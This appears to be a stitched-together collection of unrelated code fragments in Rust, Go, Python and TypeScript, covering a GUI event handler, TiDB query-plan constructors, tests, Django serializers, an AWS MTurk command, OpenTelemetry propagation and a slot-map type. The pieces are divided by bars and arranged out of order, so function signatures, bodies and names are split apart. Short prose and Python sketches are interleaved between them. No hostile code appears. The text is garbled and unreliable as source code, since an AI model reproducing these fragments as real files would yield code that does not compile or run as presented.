pub fn set_theme(&mut self, theme: Theme) { self.theme = theme }
pub fn dragged(&self) -> Option<WeakShared<Widget>>
|
pub fn set_dragged(&mut self, dragged: WeakShared<Widget>) { self.dragged = Some(dragged) }
pub fn render(&mut self, graphics: &mut Graphics) {
graphics.clear(self.theme.bg().strong());
let mut root = self.root.borrow_mut();
root.update_layout_if_needed(graphics);
root.render(graphics, &self.theme);
}
}
impl InputResponder for WidgetGUI {
fn on_mouse_down(&mut self, event: MouseClickEvent) -> bool {
let root = self.root.clone();
let mut root_ref = root.borrow_mut();
root_ref.on_mouse_down(self, event)
}
fn on_mouse_up(&mut self, event: MouseClickEvent) -> bool {
if let Some(weak_dragged) = self.dragged() {
// Only call the mouse up event on the dragged widget when present
if let Some(dragged) = weak_dragged.upgrade() {
dragged.borrow_mut().on_mouse_up(self, event);
} else {
debug!("Warning: Dragged widget is present in GUI, but it's weak pointer does not point anywhere.");
}
self.dragged = None;
}
let root = self.root.clone();
let mut root_ref = root.borrow_mut();
root_ref.on_mouse_up(self, event)
}
fn on_mouse_move(&mut self, event: MouseMoveEvent) -> bool {
let root = self.root.clone();
let mut root_ref = root.borrow_mut();
root_ref.on_mouse_move(self, event)
}
fn on_mouse_drag(&mut self, event: MouseDragEvent) -> bool {
if let Some(weak_dragged) = self.dragged() {
// Only call mouseDrag event on the dragged widget when present
if let Some(dragged) = weak_dragged.upgrade() {
dragged.borrow_mut().on_mouse_drag(self, event);
} else {
debug!("Warning: Dragged widget is present in GUI, but it's weak pointer does not point anywhere.");
}
}
let root = self.root.clone();
let mut root_ref = root.borrow_mut();
root_ref.on_mouse_drag(self, event)
}
fn on_key_down(&mut self, event: KeyEvent) -> bool {
let root = self.root.clone();
let mut root_ref = root.borrow_mut();
root_ref.on_key_down(self, event)
}
fn on_key_up(&mut self, event: KeyEvent) -> bool {
let root = self.root.clone();
let mut root_ref = root.borrow_mut();
root_ref.on_key_up(self, event)
}
}
|
{ self.dragged.as_ref().map(|it| it.clone()) }
|
initialize.go
|
// Copyright 2017 PingCAP, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// See the License for the specific language governing permissions and
// limitations under the License.
package plan
import (
"github.com/pingcap/tidb/context"
"github.com/pingcap/tidb/expression"
)
const (
// TypeSel is the type of Selection.
TypeSel = "Selection"
// TypeSet is the type of Set.
TypeSet = "Set"
// TypeProj is the type of Projection.
TypeProj = "Projection"
// TypeAgg is the type of Aggregation.
TypeAgg = "Aggregation"
// TypeStreamAgg is the type of StreamAgg.
TypeStreamAgg = "StreamAgg"
// TypeHashAgg is the type of HashAgg.
TypeHashAgg = "HashAgg"
// TypeCache is the type of cache.
TypeCache = "Cache"
// TypeShow is the type of show.
TypeShow = "Show"
// TypeJoin is the type of Join.
TypeJoin = "Join"
// TypeUnion is the type of Union.
TypeUnion = "Union"
// TypeTableScan is the type of TableScan.
TypeTableScan = "TableScan"
// TypeMemTableScan is the type of MemTableScan.
TypeMemTableScan = "MemTableScan"
// TypeUnionScan is the type of UnionScan.
TypeUnionScan = "UnionScan"
// TypeIdxScan is the type of IndexScan.
TypeIdxScan = "IndexScan"
// TypeSort is the type of Sort.
TypeSort = "Sort"
// TypeTopN is the type of TopN.
TypeTopN = "TopN"
// TypeLimit is the type of Limit.
TypeLimit = "Limit"
// TypeHashSemiJoin is the type of hash semi join.
TypeHashSemiJoin = "HashSemiJoin"
// TypeHashLeftJoin is the type of left hash join.
TypeHashLeftJoin = "HashLeftJoin"
// TypeHashRightJoin is the type of right hash join.
TypeHashRightJoin = "HashRightJoin"
// TypeMergeJoin is the type of merge join.
TypeMergeJoin = "MergeJoin"
// TypeIndexJoin is the type of index look up join.
TypeIndexJoin = "IndexJoin"
// TypeApply is the type of Apply.
TypeApply = "Apply"
// TypeMaxOneRow is the type of MaxOneRow.
TypeMaxOneRow = "MaxOneRow"
// TypeExists is the type of Exists.
TypeExists = "Exists"
// TypeDual is the type of TableDual.
TypeDual = "TableDual"
// TypeLock is the type of SelectLock.
TypeLock = "SelectLock"
// TypeInsert is the type of Insert
TypeInsert = "Insert"
// TypeUpdate is the type of Update.
TypeUpdate = "Update"
// TypeDelete is the type of Delete.
TypeDelete = "Delete"
// TypeIndexLookUp is the type of IndexLookUp.
TypeIndexLookUp = "IndexLookUp"
// TypeTableReader is the type of TableReader.
TypeTableReader = "TableReader"
// TypeIndexReader is the type of IndexReader.
TypeIndexReader = "IndexReader"
)
func (p LogicalAggregation) init(allocator *idAllocator, ctx context.Context) *LogicalAggregation {
p.basePlan = newBasePlan(TypeAgg, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
return &p
}
func (p LogicalJoin) init(allocator *idAllocator, ctx context.Context) *LogicalJoin {
p.basePlan = newBasePlan(TypeJoin, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
return &p
}
func (p DataSource) init(allocator *idAllocator, ctx context.Context) *DataSource {
p.basePlan = newBasePlan(TypeTableScan, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
return &p
}
func (p LogicalApply) init(allocator *idAllocator, ctx context.Context) *LogicalApply {
p.basePlan = newBasePlan(TypeApply, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
return &p
}
func (p Selection) init(allocator *idAllocator, ctx context.Context) *Selection {
p.basePlan = newBasePlan(TypeSel, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p Projection) init(allocator *idAllocator, ctx context.Context) *Projection {
p.basePlan = newBasePlan(TypeProj, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p Union) init(allocator *idAllocator, ctx context.Context) *Union {
p.basePlan = newBasePlan(TypeUnion, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p Sort) init(allocator *idAllocator, ctx context.Context) *Sort {
p.basePlan = newBasePlan(TypeSort, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p TopN) init(allocator *idAllocator, ctx context.Context) *TopN {
p.basePlan = newBasePlan(TypeTopN, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p Limit) init(allocator *idAllocator, ctx context.Context) *Limit {
p.basePlan = newBasePlan(TypeLimit, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p TableDual) init(allocator *idAllocator, ctx context.Context) *TableDual {
p.basePlan = newBasePlan(TypeDual, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p Exists) init(allocator *idAllocator, ctx context.Context) *Exists {
p.basePlan = newBasePlan(TypeExists, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p MaxOneRow) init(allocator *idAllocator, ctx context.Context) *MaxOneRow {
p.basePlan = newBasePlan(TypeMaxOneRow, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p Update) init(allocator *idAllocator, ctx context.Context) *Update {
p.basePlan = newBasePlan(TypeUpdate, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p Delete) init(allocator *idAllocator, ctx context.Context) *Delete {
p.basePlan = newBasePlan(TypeDelete, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p Insert) init(allocator *idAllocator, ctx context.Context) *Insert {
p.basePlan = newBasePlan(TypeInsert, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p Show) init(allocator *idAllocator, ctx context.Context) *Show {
p.basePlan = newBasePlan(TypeShow, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
|
p.basePlan = newBasePlan(TypeLock, allocator, ctx, &p)
p.baseLogicalPlan = newBaseLogicalPlan(p.basePlan)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p PhysicalTableScan) init(allocator *idAllocator, ctx context.Context) *PhysicalTableScan {
p.basePlan = newBasePlan(TypeTableScan, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p PhysicalIndexScan) init(allocator *idAllocator, ctx context.Context) *PhysicalIndexScan {
p.basePlan = newBasePlan(TypeIdxScan, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p PhysicalMemTable) init(allocator *idAllocator, ctx context.Context) *PhysicalMemTable {
p.basePlan = newBasePlan(TypeMemTableScan, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p PhysicalHashJoin) init(allocator *idAllocator, ctx context.Context) *PhysicalHashJoin {
tp := TypeHashRightJoin
if p.SmallTable == 1 {
tp = TypeHashLeftJoin
}
p.basePlan = newBasePlan(tp, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p PhysicalHashSemiJoin) init(allocator *idAllocator, ctx context.Context) *PhysicalHashSemiJoin {
p.basePlan = newBasePlan(TypeHashSemiJoin, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p PhysicalMergeJoin) init(allocator *idAllocator, ctx context.Context) *PhysicalMergeJoin {
p.basePlan = newBasePlan(TypeMergeJoin, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p PhysicalAggregation) init(allocator *idAllocator, ctx context.Context) *PhysicalAggregation {
tp := TypeHashAgg
if p.AggType == StreamedAgg {
tp = TypeStreamAgg
}
p.basePlan = newBasePlan(tp, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p PhysicalApply) init(allocator *idAllocator, ctx context.Context) *PhysicalApply {
p.basePlan = newBasePlan(TypeApply, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p Cache) init(allocator *idAllocator, ctx context.Context) *Cache {
p.basePlan = newBasePlan(TypeCache, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p PhysicalUnionScan) init(allocator *idAllocator, ctx context.Context) *PhysicalUnionScan {
p.basePlan = newBasePlan(TypeUnionScan, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
return &p
}
func (p PhysicalIndexLookUpReader) init(allocator *idAllocator, ctx context.Context) *PhysicalIndexLookUpReader {
p.basePlan = newBasePlan(TypeIndexLookUp, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
p.TablePlans = flattenPushDownPlan(p.tablePlan)
p.IndexPlans = flattenPushDownPlan(p.indexPlan)
p.NeedColHandle = p.IndexPlans[0].(*PhysicalIndexScan).NeedColHandle
p.schema = p.tablePlan.Schema()
return &p
}
func (p PhysicalTableReader) init(allocator *idAllocator, ctx context.Context) *PhysicalTableReader {
p.basePlan = newBasePlan(TypeTableReader, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
p.TablePlans = flattenPushDownPlan(p.tablePlan)
p.NeedColHandle = p.TablePlans[0].(*PhysicalTableScan).NeedColHandle
p.schema = p.tablePlan.Schema()
return &p
}
func (p PhysicalIndexReader) init(allocator *idAllocator, ctx context.Context) *PhysicalIndexReader {
p.basePlan = newBasePlan(TypeIndexReader, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
p.IndexPlans = flattenPushDownPlan(p.indexPlan)
p.NeedColHandle = p.IndexPlans[0].(*PhysicalIndexScan).NeedColHandle
if _, ok := p.indexPlan.(*PhysicalAggregation); ok {
p.schema = p.indexPlan.Schema()
} else {
is := p.IndexPlans[0].(*PhysicalIndexScan)
p.schema = is.dataSourceSchema
}
p.OutputColumns = p.schema.Clone().Columns
return &p
}
func (p PhysicalIndexJoin) init(allocator *idAllocator, ctx context.Context, children ...Plan) *PhysicalIndexJoin {
p.basePlan = newBasePlan(TypeIndexJoin, allocator, ctx, &p)
p.basePhysicalPlan = newBasePhysicalPlan(p.basePlan)
p.children = children
p.schema = expression.MergeSchema(p.children[0].Schema(), p.children[1].Schema())
return &p
}
// flattenPushDownPlan converts a plan tree to a list, whose head is the leaf node like table scan.
func flattenPushDownPlan(p PhysicalPlan) []PhysicalPlan {
plans := make([]PhysicalPlan, 0, 5)
for {
plans = append(plans, p)
if len(p.Children()) == 0 {
break
}
p = p.Children()[0].(PhysicalPlan)
}
for i := 0; i < len(plans)/2; i++ {
j := len(plans) - i - 1
plans[i], plans[j] = plans[j], plans[i]
}
return plans
}
|
func (p SelectLock) init(allocator *idAllocator, ctx context.Context) *SelectLock {
|
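flattenPushDownPlan above walks a single-child plan chain from the root down, then reverses the list so the leaf (for example a table scan) comes first. A compact Python sketch of the same walk-and-reverse, with a generic node attribute standing in for Plan.Children():
# Sketch of flattenPushDownPlan: collect root-to-leaf, then reverse so the
# leaf scan node heads the list. `children` stands in for Plan.Children().
def flatten_push_down_plan(p):
    plans = [p]
    while p.children:
        p = p.children[0]
        plans.append(p)
    plans.reverse()
    return plans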
_misc_.rs
|
// ██████╗ █████╗ ███████╗███████╗██╗███╗ ██╗ ██████╗
// ██╔══██╗██╔══██╗██╔════╝██╔════╝██║████╗ ██║██╔════╝
// ██████╔╝███████║███████╗███████╗██║██╔██╗ ██║██║ ███╗
// ██╔═══╝ ██╔══██║╚════██║╚════██║██║██║╚██╗██║██║ ██║
// ██║ ██║ ██║███████║███████║██║██║ ╚████║╚██████╔╝
// ╚═╝ ╚═╝ ╚═╝╚══════╝╚══════╝╚═╝╚═╝ ╚═══╝ ╚═════╝
#[cfg(test)]
mod passing {
use dataurl::{DataUrl, DataUrlParseError};
#[test]
fn must_have_correct_code_for_the_readme_usage_snippet() -> Result<(), DataUrlParseError> {
let data_url: DataUrl = DataUrl::parse("data:,Hello,%20World!")?;
assert_eq!(data_url.media_type(), "text/plain".to_string());
assert_eq!(data_url.media_type_no_default(), None);
assert_eq!(data_url.charset(), "US-ASCII".to_string());
assert_eq!(data_url.charset_no_default(), None);
assert!(!data_url.is_base64_encoded());
assert_eq!(
data_url.data(),
[72, 101, 108, 108, 111, 44, 32, 87, 111, 114, 108,
|
agment(), None);
assert_eq!(data_url.to_string(), "data:,Hello%2C%20World%21");
assert_eq!(data_url.text(), "Hello, World!");
Ok(())
}
}
|
100, 33]
);
assert_eq!(data_url.fr
|
Spinner.Props.ts
|
import * as React from 'react';
import { Spinner } from './Spinner';
export interface ISpinnerProps extends React.Props<Spinner> {
type?: SpinnerType;
label?: string;
className?: string;
}
export enum SpinnerType {
small,
normal,
|
}
|
large
|
util.rs
|
use std::fs::File;
use std::io::{self,BufRead};
use std::path::Path;
pub fn read_file(filename: &str) -> std::io::Result<Vec<i32>>
|
//tag::calculate-increases[]
pub fn calculate_increases(data : &Vec<i32>) -> std::io::Result<i32>
{
let mut sum = 0;
let l = data.len();
for ix in 1..l {
if data[ix] > data[ix-1] { sum += 1; }
}
return Ok(sum);
}
//end::calculate-increases[]
//tag::calculate-window[]
pub fn calculate_window(data : &Vec<i32>) -> std::io::Result<Vec<i32>>
{
let l = data.len();
let mut data2 = Vec::new();
for ix in 2..l {
let window = data[ix] + data[ix-1] + data[ix-2];
data2.push(window)
}
return Ok(data2);
}
//end::calculate-window[]
|
{
let path = Path::new(filename);
let display = path.display();
// Open the path in read-only mode, returns `io::Result<File>`
let file = match File::open(&path) {
Err(why) => panic!("couldn't open {}: {}", display, why),
Ok(file) => file,
};
let lines = io::BufReader::new(file).lines();
let mut data = Vec::new();
for line in lines {
match line {
Err(why) => panic!("couldn't read line: {}", why),
Ok(l) => {
match l.parse::<i32>() {
Ok(v) => data.push(v),
Err(why) => panic!("couldn't parse: {}", why),
}
}
}
};
return Ok(data);
}
|
logging_utils_test.py
|
#!/usr/bin/env python
# Copyright 2014 The Swarming Authors. All rights reserved.
# Use of this source code is governed by the Apache v2.0 license that can be
# found in the LICENSE file.
import logging
import os
import sys
import tempfile
import shutil
import unittest
import re
# Import this first before manipulating sys.path to ensure it can load fine.
import logging_utils
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, ROOT_DIR)
import test_env
test_env.setup_test_env()
from depot_tools import auto_stub
_LOG_HEADER = r'^%s \d\d\d\d-\d\d-\d\d \d\d:\d\d:\d\d\.\d\d\d: ' % os.getpid()
class TestLoggingUtils(auto_stub.TestCase):
def test_Capture(self):
root = logging.RootLogger(logging.DEBUG)
with logging_utils.CaptureLogs('foo', root) as log:
root.debug('foo')
result = log.read()
self.assertTrue(re.match(_LOG_HEADER + 'DEBUG foo\n$', result), result)
def test_prepare_logging(self):
root = logging.RootLogger(logging.DEBUG)
tmp_dir = tempfile.mkdtemp(prefix='logging_utils_test')
try:
filepath = os.path.join(tmp_dir, 'test.log')
logging_utils.prepare_logging(filepath, root)
root.debug('foo')
with open(filepath, 'rb') as f:
result = f.read()
finally:
shutil.rmtree(tmp_dir)
# It'd be nice to figure out a way to ensure it's properly in UTC but it's
# tricky to do reliably.
self.assertTrue(re.match(_LOG_HEADER + 'DEBUG foo\n$', result), result)
|
if __name__ == '__main__':
unittest.main()
| |
kubectl-open_svc.go
|
package main
import (
"flag"
"os"
"github.com/spf13/pflag"
"github.com/superbrothers/kubectl-open-svc-plugin/pkg/cmd"
"k8s.io/cli-runtime/pkg/genericclioptions"
"k8s.io/klog"
)
func init()
|
func main() {
flags := pflag.NewFlagSet("kubectl-open-svc", pflag.ExitOnError)
pflag.CommandLine = flags
root := cmd.NewCmdOpenService(genericclioptions.IOStreams{In: os.Stdin, Out: os.Stdout, ErrOut: os.Stderr})
if err := root.Execute(); err != nil {
os.Exit(1)
}
}
|
{
// Initialize klog flags
klog.InitFlags(flag.CommandLine)
_ = flag.CommandLine.Set("logtostderr", "true")
}
|
parser_macro.rs
|
#[macro_use]
extern crate combine;
parser! {
pub fn test[Input]()(Input) -> ()
where [Input: ::combine::Stream<Token = char>]
{
use combine::combinator::value;
let _ = ();
fn _test() { }
match Some(1) {
Some(_) => (),
None => (),
}
value(())
}
}
parser! {
pub fn test_that_parsers_with_unnamed_types_can_be_in_same_scope[Input]()(Input) -> ()
where [Input: ::combine::Stream<Token = char>]
{
use combine::combinator::value;
value(())
}
}
#[test]
fn
|
() {
test::<&str>();
test_that_parsers_with_unnamed_types_can_be_in_same_scope::<&str>();
}
|
test_that_we_dont_need_imports_for_this_macro_to_work
|
serializers.py
|
from rest_framework.serializers import ModelSerializer
from api.models import Stock_En_Tienda, Tienda, Categoria, SubCategoria, Producto
class Stock_En_TiendaSerializer(ModelSerializer):
|
class Meta:
model = Stock_En_Tienda
depth = 2
fields = '__all__'
class TiendaSerializer(ModelSerializer):
class Meta:
model = Tienda
depth = 2
fields = '__all__'
class CategoriaSerializer(ModelSerializer):
class Meta:
model = Categoria
depth = 2
fields = '__all__'
class SubCategoriaSerializer(ModelSerializer):
class Meta:
model = SubCategoria
depth = 2
fields = '__all__'
class ProductoSerializer(ModelSerializer):
class Meta:
model = Producto
depth = 2
fields = '__all__'
| |
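Every serializer above follows the same pattern: depth = 2 expands related objects two levels deep and fields = '__all__' includes every model field. A hedged usage sketch, assuming a configured Django project with these models:
# Usage sketch (assumes Django settings are configured and data exists).
productos = Producto.objects.all()
serializer = ProductoSerializer(productos, many=True)
payload = serializer.data  # list of dicts, relations expanded two levels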
NotifyWorkersCommand.ts
|
import { MTurkClientResolvedConfig, ServiceInputTypes, ServiceOutputTypes } from "../MTurkClient.ts";
import { NotifyWorkersRequest, NotifyWorkersResponse } from "../models/models_0.ts";
import {
deserializeAws_json1_1NotifyWorkersCommand,
serializeAws_json1_1NotifyWorkersCommand,
} from "../protocols/Aws_json1_1.ts";
import { getSerdePlugin } from "../../middleware-serde/mod.ts";
import { HttpRequest as __HttpRequest, HttpResponse as __HttpResponse } from "../../protocol-http/mod.ts";
import { Command as $Command } from "../../smithy-client/mod.ts";
import {
FinalizeHandlerArguments,
Handler,
HandlerExecutionContext,
MiddlewareStack,
HttpHandlerOptions as __HttpHandlerOptions,
MetadataBearer as __MetadataBearer,
SerdeContext as __SerdeContext,
} from "../../types/mod.ts";
export interface NotifyWorkersCommandInput extends NotifyWorkersRequest {}
export interface NotifyWorkersCommandOutput extends NotifyWorkersResponse, __MetadataBearer {}
/**
* <p>
* The
* <code>NotifyWorkers</code>
* operation sends an email to one or more Workers that you specify with
* the Worker ID. You can specify up to 100 Worker IDs to send the same
* message with a single call to the NotifyWorkers operation. The
* NotifyWorkers operation will send a notification email to a Worker
* only if you have previously approved or rejected work from the
* Worker.
* </p>
* @example
* Use a bare-bones client and the command you need to make an API call.
* ```javascript
* import { MTurkClient, NotifyWorkersCommand } from "../../client-mturk/mod.ts";
* // const { MTurkClient, NotifyWorkersCommand } = require("@aws-sdk/client-mturk"); // CommonJS import
* const client = new MTurkClient(config);
* const command = new NotifyWorkersCommand(input);
* const response = await client.send(command);
* ```
*
* @see {@link NotifyWorkersCommandInput} for command's `input` shape.
* @see {@link NotifyWorkersCommandOutput} for command's `response` shape.
* @see {@link MTurkClientResolvedConfig | config} for MTurkClient's `config` shape.
*
*/
export class
|
extends $Command<
NotifyWorkersCommandInput,
NotifyWorkersCommandOutput,
MTurkClientResolvedConfig
> {
// Start section: command_properties
// End section: command_properties
constructor(readonly input: NotifyWorkersCommandInput) {
// Start section: command_constructor
super();
// End section: command_constructor
}
/**
* @internal
*/
resolveMiddleware(
clientStack: MiddlewareStack<ServiceInputTypes, ServiceOutputTypes>,
configuration: MTurkClientResolvedConfig,
options?: __HttpHandlerOptions
): Handler<NotifyWorkersCommandInput, NotifyWorkersCommandOutput> {
this.middlewareStack.use(getSerdePlugin(configuration, this.serialize, this.deserialize));
const stack = clientStack.concat(this.middlewareStack);
const { logger } = configuration;
const clientName = "MTurkClient";
const commandName = "NotifyWorkersCommand";
const handlerExecutionContext: HandlerExecutionContext = {
logger,
clientName,
commandName,
inputFilterSensitiveLog: NotifyWorkersRequest.filterSensitiveLog,
outputFilterSensitiveLog: NotifyWorkersResponse.filterSensitiveLog,
};
const { requestHandler } = configuration;
return stack.resolve(
(request: FinalizeHandlerArguments<any>) =>
requestHandler.handle(request.request as __HttpRequest, options || {}),
handlerExecutionContext
);
}
private serialize(input: NotifyWorkersCommandInput, context: __SerdeContext): Promise<__HttpRequest> {
return serializeAws_json1_1NotifyWorkersCommand(input, context);
}
private deserialize(output: __HttpResponse, context: __SerdeContext): Promise<NotifyWorkersCommandOutput> {
return deserializeAws_json1_1NotifyWorkersCommand(output, context);
}
// Start section: command_body_extra
// End section: command_body_extra
}
|
NotifyWorkersCommand
|
tracer.go
|
package opentelemetry
import (
"context"
"go.opentelemetry.io/otel/baggage"
"go.opentelemetry.io/otel/propagation"
sdktrace "go.opentelemetry.io/otel/trace"
"google.golang.org/grpc/metadata"
)
// assert that metadataSupplier implements the TextMapCarrier interface
var _ propagation.TextMapCarrier = new(metadataSupplier)
type metadataSupplier struct {
metadata *metadata.MD
}
func (s *metadataSupplier) Get(key string) string {
values := s.metadata.Get(key)
if len(values) == 0 {
return ""
}
return values[0]
|
}
func (s *metadataSupplier) Set(key, value string) {
s.metadata.Set(key, value)
}
func (s *metadataSupplier) Keys() []string {
out := make([]string, 0, len(*s.metadata))
for key := range *s.metadata {
out = append(out, key)
}
return out
}
// Inject injects the metadata into ctx.
func Inject(ctx context.Context, p propagation.TextMapPropagator, metadata *metadata.MD) {
p.Inject(ctx, &metadataSupplier{
metadata: metadata,
})
}
// Extract extracts the metadata from ctx.
func Extract(ctx context.Context, p propagation.TextMapPropagator, metadata *metadata.MD) (
baggage.Baggage, sdktrace.SpanContext) {
ctx = p.Extract(ctx, &metadataSupplier{
metadata: metadata,
})
return baggage.FromContext(ctx), sdktrace.SpanContextFromContext(ctx)
}
| |
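The metadataSupplier above adapts gRPC metadata to the TextMapCarrier interface so a propagator can read and write trace headers. In opentelemetry-python a plain dict already satisfies the carrier contract, so a rough equivalent of Inject/Extract (assuming the opentelemetry-api package) looks like:
# Sketch mirroring Inject/Extract above; a dict plays the carrier role.
from opentelemetry import propagate

def inject(metadata: dict) -> None:
    propagate.inject(metadata)  # writes e.g. 'traceparent' into the dict

def extract(metadata: dict):
    return propagate.extract(metadata)  # Context holding the remote span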
level.py
|
# Build the logic for choosing the level
##################################################
#pass
if n_pregunta <= int(p_level):
level = "basicas"
elif n_pregunta <= 2 * int(p_level):
level = "intermedias"
else:
level = "avanzadas"
##################################################
return level
if __name__ == '__main__':
# check the results
print(choose_level(2, 2)) # basicas
print(choose_level(3, 2)) # intermedias
print(choose_level(7, 2)) # avanzadas
print(choose_level(4, 3)) # intermedias
|
def choose_level(n_pregunta, p_level):
|
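Reassembling the prefix and the def line above gives the complete function; the asserts restate the expected outputs noted in the __main__ block. A sanity sketch:
# Sanity sketch: choose_level reassembled from the pieces above, checked
# against the expected levels from the __main__ comments.
def choose_level(n_pregunta, p_level):
    if n_pregunta <= int(p_level):
        return "basicas"
    elif n_pregunta <= 2 * int(p_level):
        return "intermedias"
    else:
        return "avanzadas"

assert choose_level(2, 2) == "basicas"
assert choose_level(3, 2) == "intermedias"
assert choose_level(7, 2) == "avanzadas"
assert choose_level(4, 3) == "intermedias"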
|
shopping-list.model.ts
|
export class
|
{
}
|
ShoppingList
|
secondary.rs
|
//! Contains the secondary map implementation.
use super::{is_older_version, Key, KeyData};
#[cfg(all(nightly, any(doc, feature = "unstable")))]
use alloc::collections::TryReserveError;
use alloc::vec::Vec;
use core::hint::unreachable_unchecked;
use core::iter::{Enumerate, Extend, FromIterator, FusedIterator};
use core::marker::PhantomData;
use core::mem::replace;
#[allow(unused_imports)] // MaybeUninit is only used on nightly at the moment.
use core::mem::MaybeUninit;
use core::num::NonZeroU32;
use core::ops::{Index, IndexMut};
// This representation works because we don't have to store the versions
// of removed elements.
#[derive(Debug, Clone)]
enum Slot<T> {
Occupied { value: T, version: NonZeroU32 },
Vacant,
}
use self::Slot::Occupied;
use self::Slot::Vacant;
impl<T> Slot<T> {
pub fn new_occupied(version: u32, value: T) -> Self {
Occupied {
value,
version: unsafe { NonZeroU32::new_unchecked(version | 1u32) },
}
}
pub fn new_vacant() -> Self {
Vacant
}
// Is this slot occupied?
#[inline(always)]
pub fn occupied(&self) -> bool {
match self {
Occupied { .. } => true,
Vacant => false,
}
}
#[inline(always)]
pub fn version(&self) -> u32 {
match self {
Occupied { version, .. } => version.get(),
Vacant => 0,
}
}
pub unsafe fn get_unchecked(&self) -> &T {
match self {
Occupied { value, .. } => value,
Vacant => unreachable_unchecked(),
}
}
pub unsafe fn get_unchecked_mut(&mut self) -> &mut T {
match self {
Occupied { value, .. } => value,
Vacant => unreachable_unchecked(),
}
}
pub fn into_option(self) -> Option<T> {
match self {
Occupied { value, .. } => Some(value),
Vacant => None,
}
}
}
/// Secondary map, associate data with previously stored elements in a slot map.
///
/// A [`SecondaryMap`] allows you to efficiently store additional information
/// for each element in a slot map. You can have multiple secondary maps per
/// slot map, but not multiple slot maps per secondary map. It is safe but
/// unspecified behavior if you use keys from multiple different slot maps in
/// the same [`SecondaryMap`].
///
/// A [`SecondaryMap`] does not leak memory even if you never remove elements.
/// In return, when you remove a key from the primary slot map, after any insert
/// the space associated with the removed element may be reclaimed. Don't expect
/// the values associated with a removed key to stick around after an insertion
/// has happened!
///
/// Finally, a note on memory complexity: a [`SecondaryMap`] can use memory for
/// each slot in the primary slot map, and has to iterate over every slot during
/// iteration, regardless of whether you have inserted an associative value at
/// that key or not. If you have some property that you only expect to set for a
/// minority of keys, use a [`SparseSecondaryMap`](crate::SparseSecondaryMap),
/// which is backed by a [`HashMap`](std::collections::HashMap).
///
/// Example usage:
///
/// ```
/// # use slotmap::*;
/// let mut players = SlotMap::new();
/// let mut health = SecondaryMap::new();
/// let mut ammo = SecondaryMap::new();
///
/// let alice = players.insert("alice");
/// let bob = players.insert("bob");
///
/// for p in players.keys() {
/// health.insert(p, 100);
/// ammo.insert(p, 30);
/// }
///
/// // Alice attacks Bob with all her ammo!
/// health[bob] -= ammo[alice] * 3;
/// ammo[alice] = 0;
/// ```
#[derive(Debug, Clone)]
pub struct SecondaryMap<K: Key, V> {
slots: Vec<Slot<V>>,
num_elems: usize,
_k: PhantomData<fn(K) -> K>,
}
